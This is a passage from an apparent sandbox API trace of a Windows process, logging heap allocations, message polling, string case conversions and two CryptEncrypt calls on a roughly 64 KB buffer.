lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0210.111] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0210.111] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0210.111] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d70 [0210.111] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0210.112] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0210.112] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0210.112] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0210.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.113] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d70 | out: hHeap=0x2af0000) returned 1 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.113] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.113] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0210.113] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0210.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0210.114] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0210.114] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0210.114] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.114] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.114] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.115] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0210.115] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0210.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.119] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0210.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab248, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.121] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xfb7e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xfb80) returned 1 [0210.121] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.121] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.121] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.121] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.121] CharLowerBuffW (in: lpsz="byte[64384]", cchLength=0xb | out: lpsz="byte[64384]") returned 0xb [0210.122] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.123] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.123] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.123] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.123] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.123] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.123] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab338, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.123] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xfb7e, dwBufLen=0xfb80 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xfb80) returned 1 [0210.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.126] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.126] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.126] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.126] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.126] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.126] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.126] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.126] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.126] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 